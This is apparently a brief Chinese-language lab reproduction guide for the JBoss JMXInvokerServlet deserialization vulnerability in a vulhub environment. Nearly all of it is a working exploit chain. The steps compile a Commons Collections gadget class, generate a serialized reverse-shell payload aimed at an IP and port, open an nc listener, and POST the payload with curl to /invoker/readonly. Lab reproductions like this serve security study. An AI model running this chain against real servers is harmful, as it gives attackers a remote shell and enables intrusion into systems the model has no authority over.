环境
vulhub/jboss/JMXInvokerServlet-deserialization
复现
此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。访问若提示下载
JMXInvokerServlet,则可能存在漏洞:
#创建class⽂件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHa
shMap.java
#创建反序列化⽂件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 123.57.211.129:6666
#监听 6666 端⼝
nc -lvvp 6666
#psot提交
curl http://123.57.211.129:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser